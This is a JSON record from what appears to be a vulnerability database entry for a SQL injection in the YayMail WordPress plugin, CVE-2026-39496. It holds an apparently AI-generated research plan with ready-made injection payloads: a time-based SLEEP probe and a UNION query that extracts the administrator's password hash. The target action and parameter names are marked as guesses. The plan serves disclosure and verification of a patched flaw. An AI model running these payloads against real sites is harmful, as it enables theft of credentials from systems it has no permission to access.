[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fx6dkLR9hCOUGs1vmsZbJ0HKYlGKvNXp7JA54WMFgjvI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-39496","yaymail-authenticated-shop-manager-sql-injection","YayMail \u003C= 4.3.3 - Authenticated (Shop manager+) SQL Injection","The YayMail plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with shop manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","yaymail",null,"\u003C=4.3.3","4.3.4","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-15 00:00:00","2026-04-15 21:25:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F83c97e9b-a5bc-4059-8355-f93a7a36037c?source=api-prod",32,[22,23,24,25],"assets\u002Fdist\u002Fyaymail\u002Fmanifest.json","assets\u002Fdist\u002Fyaymail\u002Fvendor_antd_form-9ff52ab8.js","assets\u002Fdist\u002Fyaymail\u002Fvendor_antd_table-57908d1d.js","assets\u002Fdist\u002Fyaymail\u002Fyaymail-main-909f2949.css","researched",false,3,"This research plan outlines the steps to verify and exploit an authenticated SQL injection vulnerability in the **YayMail – WooCommerce Email Customizer** plugin (CVE-2026-39496).\n\n## 1. Vulnerability Summary\nThe YayMail plugin (versions \u003C= 4.3.3) fails to properly sanitize or prepare user-supplied parameters before incorporating them into SQL queries. This allows an authenticated attacker with **Shop Manager** (or higher) privileges to inject arbitrary SQL commands. This is particularly critical as Shop Managers are intended to manage WooCommerce settings but should not have direct database access.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** Likely `yaymail_get_template`, `yaymail_get_history`, or `yaymail_save_template` (inferred from typical YayMail functionality).\n- **Vulnerable Parameter:** Likely a `template_id`, `id`, or `type` parameter (inferred).\n- **Authentication:** Required (Shop Manager+).\n- **Preconditions:** The plugin must be active, and at least one WooCommerce email template must exist or be accessible for editing.\n\n## 3. Code Flow\n1.  **Entry Point:** The Shop Manager triggers an AJAX request via the YayMail customizer interface.\n2.  **Hook Registration:** The plugin registers a handler via `add_action( 'wp_ajax_yaymail_...' )`.\n3.  **Data Retrieval:** The handler retrieves user input from `$_POST` or `$_GET`.\n4.  **Vulnerable Sink:** The input is concatenated into a string and passed to `$wpdb->get_results()`, `$wpdb->get_row()`, or `$wpdb->query()` without the use of `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nYayMail utilizes nonces for its AJAX operations. Since we have Shop Manager access, we must extract the nonce from the YayMail admin dashboard.\n\n1.  **Access Page:** Navigate to the YayMail settings page: `\u002Fwp-admin\u002Fadmin.php?page=yaymail-settings`.\n2.  **Identify Variable:** Look for the localized script variable (likely `yaymail_settings`, `yaymail_params`, or `YayMailData`).\n3.  **Execution Agent Steps:**\n    *   Log in as Shop Manager.\n    *   Navigate to the YayMail settings page.\n    *   Run `browser_eval(\"window.yaymail_settings?.nonce\")` (inferred name) or inspect the page source for the inline script emitted by `wp_localize_script` that carries the nonce value; the PHP call `wp_create_nonce` itself never appears in the rendered page.\n\n## 5. Discovery Phase (Mandatory)\nSince the specific vulnerable function was not provided in the source snippet, the agent must first identify the sink:\n\n1.  
**Search for Queries:**\n    ```bash\n    grep -rP '\\$wpdb->(get_results|get_row|query|get_var)\\s*\\([^;]*\\$_(POST|GET|REQUEST)' wp-content\u002Fplugins\u002Fyaymail\u002F\n    ```\n    This pattern only matches a superglobal referenced directly inside the query call. If the handler copies the parameter into a local variable first, the match fails, so also list every `$wpdb->` call built by string concatenation or interpolation rather than `$wpdb->prepare()` and trace its variables back to `$_POST` or `$_GET`.\n2.  **Identify the AJAX Action:**\n    Identify the `add_action` call associated with the vulnerable function found in step 1.\n\n## 6. Exploitation Strategy\nAssuming the vulnerable action is `yaymail_get_template` and the parameter is `template_id`:\n\n### Step 1: Verification (Time-Based)\nSend a request to confirm the injection point exists.\n- **Payload:** `template_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n- **Request** (body shown unencoded for readability; URL-encode spaces, parentheses and other reserved characters before sending):\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n  \"body\": \"action=yaymail_get_template&template_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&nonce=NONCE_HERE\"\n}\n```\n\n### Step 2: Extraction (UNION-Based)\nExtract the administrator's password hash from the `wp_users` table (`wp_` is the default table prefix; substitute the site's actual prefix if it differs).\n1.  **Find Column Count:** Inject `ORDER BY n` with n = 1, 2, 3, ... until the query errors; the last n that succeeds is the number of columns in the original `SELECT`.\n2.  **Extract Hash:** Use a non-existent ID (`-1`) so that only the `UNION` row is returned.\n- **Payload (assuming 5 columns):** `-1 UNION SELECT 1,user_pass,3,4,5 FROM wp_users WHERE ID=1-- -`\n- **Request:**\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n  \"body\": \"action=yaymail_get_template&template_id=-1 UNION SELECT 1,user_pass,3,4,5 FROM wp_users WHERE ID=1-- -&nonce=NONCE_HERE\"\n}\n```\n\n## 7. Test Data Setup\n1.  **User Creation:** Create a user with the `shop_manager` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=shop_manager --user_pass=password123\n    ```\n2.  **Plugin Setup:** Ensure YayMail and WooCommerce are installed and active.\n3.  **Content:** Create at least one template in YayMail to ensure the underlying queries return rows if valid IDs are provided.\n\n## 8. 
Expected Results\n- **Success:** The HTTP response contains the administrator's `$P$` or `$wp$` hash in the field where a template name or property was expected.\n- **Blind:** If UNION is not possible, the response time is significantly delayed (>= 5 seconds) when the `SLEEP` payload is sent.\n\n## 9. Verification Steps\n1.  **Retrieve Hash via CLI** (on sites with a custom table prefix, replace `wp_` with the output of `wp db prefix`):\n    ```bash\n    wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"\n    ```\n2.  **Compare:** Verify that the hash obtained via the SQL injection matches the hash retrieved via WP-CLI.\n\n## 10. Alternative Approaches\n- **Error-Based:** If database errors are rendered in the response (`WP_DEBUG` together with `WP_DEBUG_DISPLAY` enabled), use `updatexml()` or `extractvalue()` to force the database to leak the hash in an error message.\n- **Boolean-Based:** If output is suppressed, use `AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_pass LIKE '$P$%')` and check for the presence of a success\u002Ffail message in the JSON response.\n- **Alternative Actions (Backup):** Check the following actions if `yaymail_get_template` is not the sink:\n    - `yaymail_duplicate_template`\n    - `yaymail_delete_template`\n    - `yaymail_get_history`\n    - `yaymail_export_template`","gemini-3-flash-preview","2026-04-18 03:37:25","2026-04-18 03:38:31",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.3.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyaymail\u002Ftags\u002F4.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyaymail.4.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyaymail\u002Ftags\u002F4.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyaymail.4.3.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyaymail\u002Ftags"]